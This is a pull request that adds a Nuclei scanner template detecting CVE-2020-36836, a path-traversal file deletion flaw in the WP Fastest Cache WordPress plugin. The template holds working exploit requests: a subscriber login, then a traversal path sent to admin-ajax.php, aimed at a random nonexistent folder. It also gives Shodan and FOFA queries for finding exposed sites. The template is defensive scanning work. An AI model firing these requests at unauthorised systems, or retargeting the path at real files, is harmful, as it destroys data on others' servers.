### PR TITLE
CVE-2020-36836

### DIFF
--- a/http/cves/2020/CVE-2020-36836.yaml
+++ b/http/cves/2020/CVE-2020-36836.yaml
@@ -1,0 +1,52 @@
+id: CVE-2020-36836
+
+info:
+  name: WP Fastest Cache <= 0.9.0.2 - Authenticated (Subscriber+) Arbitrary File Deletion
+  author: s4e-io
+  severity: high
+  description: |
+    The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-36836
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/82f80916-37ab-4c5a-9787-2544c620acac?source=cve
+    - https://wearetradecraft.com/advisories/tc-2020-0001/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-36836
+    cwe-id: CWE-352,CWE-22
+    epss-score: 0.00085
+    epss-percentile: 0.25683
+    cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: wpfastestcache
+    product: wp_fastest_cache
+    framework: wordpress
+    shodan-query: http.html:"/wp-content/plugins/wp-fastest-cache/"
+    fofa-query: body=/wp-content/plugins/wp-fastest-cache/
+    publicwww-query: /wp-content/plugins/wp-fastest-cache/
+  tags: cve,cve2020,wordpress
+
+variables:
+  folder_name: "{{to_lower(rand_text_alpha(16))}}"
+
+http:
+  - raw:
+      - | # login a subscriber+ account
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin-ajax.php?path=/../../plugins/wp-fastest-cache/{{folder_name}}&action=wpfc_delete_current_page_cache HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body_2, "The cache of page has been cleared", "success")'
+          - 'contains(content_type_2, "text/html")'
+          - "status_code_2 == 200"
+        condition: and


### PR DESCRIPTION
hi
I noticed that it’s not necessary to delete a valid folder in order to trigger the payload. I designed the template this way. I’m attaching the outputs for the vulnerable version and the non-vulnerable version here. I’m also including my Nuclei debug files. I have also sent this process via email.
[wp-fast-vuln-debug.txt](https://github.com/user-attachments/files/22199103/wp-fast-vuln-debug.txt)
[wp-fast-not-vuln-version-debug.txt](https://github.com/user-attachments/files/22199105/wp-fast-not-vuln-version-debug.txt)

I've validated this template locally?
- [x] YES
- [ ] NO

not vuln
<img width="1136" height="680" alt="Ekran Resmi 2025-09-08 02 38 30" src="https://github.com/user-attachments/assets/7caa93eb-9ee9-4356-968d-10f11f41f225" />

vuln
<img width="1121" height="666" alt="Ekran Resmi 2025-09-08 02 38 22" src="https://github.com/user-attachments/assets/a02f873d-84eb-410e-885a-d5b4669404fa" />


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)